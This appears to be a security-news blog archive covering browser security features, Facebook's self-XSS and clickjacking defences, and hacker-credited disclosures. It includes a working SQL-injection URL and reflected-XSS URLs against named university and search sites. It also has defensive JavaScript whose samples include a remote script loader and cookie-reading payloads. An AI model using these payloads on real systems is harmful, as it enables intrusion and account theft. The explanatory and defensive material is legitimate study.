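The last entry is the one to watch for in real policies: a `script-src` that carries `'unsafe-inline'` still lets the injected inline payload run, so it buys nothing against the reflected XSS cases this article is about.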


Other improvements are equally attractive, from a less revealing User-Agent header to a Do Not Track option that requires a simple opt-in to enable. However, Do Not Track works on an honor system: the site is notified of your desire for privacy, but it does not have to comply with your request.


HTTP Strict Transport Security (HSTS) lets a site tell the browser, via the Strict-Transport-Security response header, that it must be reached only over HTTPS for a stated period. Once Facebook or another site has sent that header, Firefox rewrites later plain-HTTP requests to that host to HTTPS before they leave the browser, which defeats SSL-strip attacks on those pages. The caveat is that the very first visit, before the header has been seen, is still unprotected.
Firefox 4 also hides visited links from an attacker. The user still sees a visited link change colour, but a script on the page can no longer read that colour back: Firefox restricts which styles :visited may change and has getComputedStyle report the unvisited style, which stops a page from sniffing the browser history through CSS.



Internet Explorer 9 (IE9)
IE9, says Microsoft, blocked 99 percent of socially engineered malware attacks. If the claim is true, that is about five times Firefox's score. However, both Mozilla and Google contest the interpretation as a definitive competitive edge for IE9, since the type of malware the finding applies to is not a common threat.


It is important to remember, too, that IE is targeted more often than Firefox simply because of economies of scale. Attackers know that even people who use Firefox or Chrome often also have IE on their computers and use it at least occasionally, so it makes economic sense to target it over the competition.


In any case, IE9 is a significant upgrade from previous versions. It appears to run faster too, which is helpful.


ActiveX Filtering lets the user block ActiveX controls across all sites and then allow them per site where they are genuinely needed.
Tracking Protection is a new feature that lets users control what they share. Tracking Protection Lists, published by partners PrivacyChoice, TRUSTe, Abine and Adblock Plus, make the browser block content from the listed third-party tracking domains. IE9 also sends a Do Not Track header, but just like with Firefox 4 that header works on an honor system: the site is notified of your desire for privacy, but it does not have to comply with your request.
The download manager has an integrated SmartScreen malware protection feature. SmartScreen Application Reputation cuts down on the aggravation factor as much as on security threats: it greatly reduces the number of warning prompts by dropping them entirely for well-known, widely downloaded files and warns only when the likelihood of malware is high. The "pinning" feature also helps, as it lets users pin frequently visited, trusted sites to the Windows taskbar, which then run in their own session. The pinning feature helps prevent HTTPS-to-HTTP redirects.
IE9 also has improved memory protection to make it harder for attackers to exploit memory-corruption vulnerabilities in the browser or any of its add-ons.
And the winner is ...
The consumer!


At this point, security is no longer a major deciding factor in which browser you should use, since both have seriously beefed up their protection. Not that you're totally safe from attackers, but at least these two browsers have finally bolted the doors and locked the windows.


A prolific and versatile writer, Pam Baker's published credits include numerous articles in leading publications including, but not limited to: Institutional Investor magazine, CIO.com, NetworkWorld, ComputerWorld, IT World, Linux World, Internet News, E-Commerce Times, LinuxInsider, CIO Today Magazine, NPTech News (nonprofits), MedTech Journal, I Six Sigma magazine, Computer Sweden, NY Times, and Knight-Ridder/McClatchy newspapers. She has also authored several analytical studies on technology and eight books. Baker also wrote and produced an award-winning documentary on paper-making. She is a member of the National Press Club (NPC), Society of Professional Journalists (SPJ), and the Internet Press Guild (IPG).


Facebook, spammers are in 'arms race'



Within days of Facebook rolling out new security features designed to block spam, several new social-engineering attacks were spreading that somehow managed to get by the company's antispam defenses.
The spammers have modified their handiwork so it gets past Facebook's scam-detection system, company spokesman Fred Wolens said today.
"There are new methods they've picked up after we put out the protections on Thursday," he said. "It's an arms race. We put out new protections and they come up with new campaigns...When we announced the new security features, they were calibrated for all the self-XSS attacks we'd seen at the time."


The company began turning on a feature last week that displays warnings when it detects that users are about to be duped by cross-site scripting (XSS) and clickjacking attacks. In such attacks, people are tricked into clicking something (clickjacking) or pasting code into their browser's address bar (self-XSS).
Yet several XSS attacks this weekend and today did not trigger the warnings. In one of them, users were tempted with a post that said "Facebook now has a dislike button! Click 'Enable Dislike Button' to turn on the new feature!" (On a side note, Wolens artfully dodged the question of whether Facebook would ever add a "dislike" button.)
Another attack falsely offered a way to see how many people had viewed your profile, as an indication of how popular you are, and urged people to click the "Scan Profile" link. The link led to an external site where the user was eventually prompted to cut and paste JavaScript code into the browser address bar, said Satnam Narang, a threat analyst at M86. (Facebook does not offer a way to see such statistics on profiles.)
A third attack tempted people with a comment of "WTF!! You look so stupid in this video" or something similar. A Flash file is loaded when the link is clicked, and people were encouraged to press the CTRL and V keys, whereupon malicious JavaScript was pasted from the clipboard into the browser address bar, according to a Zscaler blog post.
In all cases the user action results in the spam messages being re-posted to the victim's Facebook pages and those of their friends. Ultimately, surveys are proffered for the victim to fill out. The spammers get money for each survey completed, and the farther the spam spreads the more money can be made.
Facebook did not disclose exactly what goes on behind the scenes, since that could help spammers in their efforts. Narang said he suspected that some of the spam was getting past Facebook's defenses by obfuscating the JavaScript. Facebook seems to have made it harder for spammers to create campaigns that execute automatically and spam your friends, so victims are now sent off to external sites and required to cut and paste text into their browsers, he said.

 But "the hole is still there because they are still able to generate these posts," by tricking users into clicking links and following further instructions, he added.
Facebook is learning and improving the situation with each new spam campaign and iteration of its defenses, Wolens said.
"Within a few hours of this video (spam campaign) we were able to put that information back into the system to protect people," he said.




Vulnerabilities on the University of Manchester and University of Liverpool websites

Multiple vulnerabilities found by Zero on the University of Manchester and University of Liverpool websites


University Of Manchester:- 
Website: - http://www.manchester.ac.uk/
Vulnerability: - SQL injection & non-persistent (reflected) XSS


Vulnerable Link(SQL-i):- http://www.manchester.ac.uk/aboutus/news/archive/list/?year=2011&month=-02+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables%20WHERE%20table_schema=database%28%29--
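The link above injects through the `month` parameter: a negative month empties the real result set, then `UNION SELECT ... FROM information_schema.tables` pads to the page's twelve columns and uses `group_concat` to pull every table name of the current database into one row. The following is an added example, not the university's code, showing the query-building pattern that makes this possible beside the fix. The table and column names (`news_archive`, `year`, `month`) are assumptions for illustration; the URL is the one reported above and is only parsed, never fetched.

```javascript
// Added example (not the university's code). Table/column names are assumptions.
const REPORTED_URL = 'http://www.manchester.ac.uk/aboutus/news/archive/list/?year=2011&month=-02+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables%20WHERE%20table_schema=database%28%29--';

// Pull year/month out of the query string exactly as a web app would see them
// (URLSearchParams undoes the + and %xx encoding). Nothing is fetched.
function paramsFromUrl(url) {
  const sp = new URL(url).searchParams;
  return { year: sp.get('year'), month: sp.get('month') };
}

// VULNERABLE: request values are pasted into the SQL text. With the reported
// month value the "-02" closes the intended comparison, UNION SELECT appends a
// second result set (padded to the real query's column count, 12 in the
// reported URL) and "--" comments out whatever followed.
function buildArchiveQueryVulnerable(year, month) {
  return `SELECT id, title, summary, published FROM news_archive WHERE year = ${year} AND month = ${month}`;
}

// FIX, step 1: validate against what the parameter can legitimately be, and
// reject anything else. Do not try to "clean" the value.
function parseArchiveParams(query) {
  const year = /^\d{4}$/.test(query.year || '') ? Number(query.year) : null;
  const month = /^(0?[1-9]|1[0-2])$/.test(query.month || '') ? Number(query.month) : null;
  if (year === null || month === null) return null;
  return { year, month };
}

// FIX, step 2: keep data out of the SQL text entirely. The object below is the
// shape most drivers take (statement text with placeholders, values separately);
// the database then never parses the values as SQL.
function buildArchiveQuerySafe(params) {
  return {
    text: 'SELECT id, title, summary, published FROM news_archive WHERE year = ? AND month = ?',
    values: [params.year, params.month],
  };
}

function demo() {
  const raw = paramsFromUrl(REPORTED_URL);
  const vulnerableSql = buildArchiveQueryVulnerable(raw.year, raw.month);
  const validated = parseArchiveParams(raw);                  // null: request rejected
  const safeForGoodInput = buildArchiveQuerySafe(parseArchiveParams({ year: '2011', month: '02' }));
  return {
    injectedMonth: raw.month,
    injectionReachesDatabase: /union\s+select/i.test(vulnerableSql),
    payloadRejectedByValidation: validated === null,
    safeStatement: safeForGoodInput,
  };
}

console.log(demo());
```

Validation alone would have stopped this particular payload, but the parameterised statement is the part that holds up when the next parameter is free text (a search box, a name) where no whitelist applies; use both.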


Vulnerable Link(XSS):- http://www.manchester.ac.uk/aboutus/search/index.htm?num=10&as_dt=i&oe=UTF8&ie=UTF8&access=p&filter=1&numgm=5&output=xml_no_dtd&client=MAN_aboutus_search&site=University&q=%3Cscript%3Ealert%28%22A%22%29%3C/script%3E

University Of Liverpool:-


Babylon Search Engine Is XSS Vulnerable Said Darklord


An XSS vulnerability was found by Darklord in the Babylon search engine. According to the hacker, Babylon is vulnerable to a particular form of XSS: it can be attacked by putting a normal string first and then the script. The search engine does implement XSS filtering, but the filter can be bypassed by crafting a different vector such as the one shown in the screenshot.


Vulnerable Link Submitted By The Hacker:-
http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0
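The reported URL is all that is known about Babylon's filter, so the following is an added example, not Babylon's code: a hypothetical search handler with the kind of filter that a "normal string first" payload walks past, next to the output-encoding fix that does not depend on guessing the payload's shape. The filter rule (`reject only input that starts with <script`) is an assumption made up to illustrate the bypass pattern; the query string is decoded from the URL quoted above and nothing is fetched.

```javascript
// Added example (not Babylon's code). The naive filter is a hypothetical rule.
const REPORTED_URL = 'http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0';

// The q parameter as the server would see it after URL decoding.
function reportedQuery() {
  return new URL(REPORTED_URL).searchParams.get('q');
}

// Hypothetical weak filter: only rejects input that *begins* with a script tag,
// so prefixing any ordinary text defeats it.
function naiveFilter(q) {
  return /^\s*<\s*script/i.test(q) ? '' : q;
}

// VULNERABLE: filtered query is echoed into HTML without encoding.
function renderResultsVulnerable(q) {
  return `<h1>Results for ${naiveFilter(q)}</h1>`;
}

// FIX: encode for the HTML text context. This works for every input, so there
// is no "different vector" to craft.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderResultsHardened(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Crude check used only to compare the two renderings: is there a real
// <script> element in the output?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

function demo() {
  const prefixed = reportedQuery();                          // helloworld<script>...</script>helloworld
  const bare = "<script>alert('hackingalert');</script>";
  return {
    bareBlockedByFilter: !containsScriptTag(renderResultsVulnerable(bare)),
    prefixedBypassesFilter: containsScriptTag(renderResultsVulnerable(prefixed)),
    prefixedNeutralisedByEncoding: !containsScriptTag(renderResultsHardened(prefixed)),
    hardenedOutput: renderResultsHardened(prefixed),
  };
}

console.log(demo());
```

The general point: a blocklist has to anticipate every vector, while context-correct output encoding only has to know the context it writes into. Encoding for HTML text is not enough if the value lands inside an attribute, a `<script>` block or a URL; each of those needs its own encoder.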





XSS vulnerability on National Space Agency Pakistan & Pak Gov Radio's Websites



The website of the National Space Agency of Pakistan (SUPARCO) is vulnerable to XSS.
Website link:-
http://www.suparco.gov.pk/




Also 
The official website of Pakistan's government radio station is also vulnerable to XSS.
Website link:-
www.radio.gov.pk


Both vulnerabilities were found by XSS master Zero Cool.


Vulnerabilities in Stanford University & China Airlines websites found by Minhal

Vulnerabilities in the Stanford University and China Airlines websites were found by Minhal Mehdi: an XSS vulnerability in China Airlines' website and multiple vulnerabilities in Stanford University's website.


Stanford University:-





China-Airlines:-



Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS


Facebook has released several new security features designed to thwart unauthorized logins and the cross-site scripting and clickjacking tricks that lure users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to the user's phone, while self-XSS and clickjacking protection warns users and requires them to confirm their actions when pasting code into their browser or clicking suspicious Like buttons.
These protections should reduce the prevalence of hijacked accounts and of the highly visible news-feed spam that perpetuates the public perception of Facebook as less safe than the rest of the internet.



Facebook’s latest internal security efforts were announced alongside a new partnership with Web of Trust, a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords.

Login Approvals

Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which requires them to verify their phone number. Once enabled, any time someone attempts to log in to the account from a new or unrecognized device, they will have to enter a code sent to the phone via SMS. The next time users successfully log in they will also be notified of any suspicious attempts thwarted by the login approvals feature.



Users with Login Approvals enabled could be temporarily locked out of their account in the unlikely event that both their phone and their approved login device are lost or stolen. Still, the feature offers a strong additional layer of security for those who opt in. It can also protect users who share their password with a loved one for use on their regular login device but don't want that person to access the account from elsewhere.

Clickjacking Protection

Clickjacking is when a malicious website hides an active element, such as a Like button loaded in a transparent iframe, beneath an image or other disguise to fool a user into clicking something they didn't intend to. In Facebook's case, malicious sites conceal Like buttons beneath video players or appealing offers, so users inadvertently share the spam site to the news feed, drawing more users into the scam.
Facebook already has automated systems designed to identify and disable uses of the Like button for clickjacking, and to block or remove outbound links to clickjacking sites. Now Facebook has added further protection by requiring users to confirm that they meant to click a Like button suspected of being part of a clickjacking scheme. The Like won't go through, and no story will be published to the news feed, unless the user confirms.
This feature could cut down on one of the most prominent Facebook security threats of late, which has spread through links promising videos of racy or gruesome content.

Self-XSS Protection

Self cross-site scripting (self-XSS) is a threat in which a spam news feed story, wall post or message asks users to copy malicious code into their browser's address bar; the script then runs with the victim's own Facebook session and posts the spammer's message to more friends. These threats have become increasingly sophisticated over the years (if you want to get deeper into the topic, see security researcher Joey Tyson’s Social Hacking blog).
The new feature detects when a user attempts to paste such code into the browser, displays an alert explaining why copying code into a browser is dangerous, and prevents the code from running.
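Facebook has not published how its detector works, and the "arms race" post above notes that spammers slipped past it by obfuscating the JavaScript. The following is an added example, not Facebook's code, serving both that post and this section: a heuristic classifier for text about to be pasted into the address bar that first undoes two cheap obfuscations (percent-encoding and `String.fromCharCode` character lists) and then scores the result. The indicator list, the allow/warn/block thresholds and the sample lures are all assumptions built for illustration; `example.invalid` is a reserved, non-resolving name.

```javascript
// Added example (not Facebook's code). Rules, thresholds and samples are assumptions.

// Indicators, each with the reason that would be shown to the user.
const INDICATORS = [
  [/^javascript:/i, 'javascript: URL scheme'],
  [/\beval\s*\(/i, 'eval()'],
  [/document\.cookie/i, 'reads document.cookie'],
  [/\.(src|innerHTML)\s*=/i, 'injects script or markup'],
  [/createElement\s*\(\s*['"]script['"]\s*\)/i, 'loads a remote script'],
  [/XMLHttpRequest|fetch\s*\(/i, 'makes requests as the logged-in user'],
];

// Undo the obfuscations seen in these campaigns before matching. A production
// check must also tolerate "java\nscript:" and similar forms browsers accept.
function normalizePaste(text) {
  let t = text.trim();
  for (let i = 0; i < 3; i++) {                    // bounded: handles nested encoding
    let decoded;
    try { decoded = decodeURIComponent(t); } catch (e) { break; }
    if (decoded === t) break;
    t = decoded;
  }
  // String.fromCharCode(100,111,...) -> the literal it builds, as a JS string
  t = t.replace(/String\.fromCharCode\(([\d,\s]+)\)/gi, (_, list) =>
    JSON.stringify(String.fromCharCode(...list.split(',').map((n) => parseInt(n, 10)))));
  return t;
}

// Returns { verdict: 'allow' | 'warn' | 'block', reasons: [...] }.
// Anything that is a javascript: URL, or trips two or more indicators, is blocked;
// a single indicator only warns, to keep false positives on ordinary pastes low.
function classifyPaste(text) {
  const t = normalizePaste(text);
  const reasons = INDICATORS.filter(([re]) => re.test(t)).map(([, why]) => why);
  let verdict = 'allow';
  if (reasons.includes('javascript: URL scheme') || reasons.length >= 2) verdict = 'block';
  else if (reasons.length === 1) verdict = 'warn';
  return { verdict, reasons };
}

// Constructed samples modelled on the lures described in the text.
const SAMPLES = {
  dislikeButton: 'javascript:(function(){var s=document.createElement("script");' +
    's.src="http://example.invalid/dislike.js";document.body.appendChild(s);})()',
  // javascript:eval("document.cookie") with the string spelled out as char codes
  charCodeObfuscated: 'javascript:eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))',
  percentEncoded: '%6Aavascript:alert(1)',
  bareSnippet: 'alert(document.cookie)',
  ordinaryLink: 'https://www.facebook.com/profile.php?id=4',
};

function classifyAll() {
  const out = {};
  for (const [name, text] of Object.entries(SAMPLES)) out[name] = classifyPaste(text).verdict;
  return out;
}

console.log(classifyAll());
```

The normalisation step is the point of the example: matching on raw strings is exactly what the obfuscated campaigns defeated, and each new encoding trick the spammers adopt has to be folded in here, which is the arms race Wolens describes.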


By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future.



Huffingtonpost, EA, IGN, NYTimes & Many Other High Profile Sites Are Vulnerable Said "TeamHav0k"

A new hacker group named "TeamHav0k", most probably formed in the last year, has spent last week and this week looking for XSS vulnerabilities in many high-profile sites, in an effort they call "#OP XSS". In a Pastebin post they have released all their findings from the past week. The most notable are in the websites of CERN, the NYTimes, Dr Pepper, The Huffington Post, EA, IGN, ImageShack, Verizon and others. All the #OP XSS findings can be found in the Pastebin release.




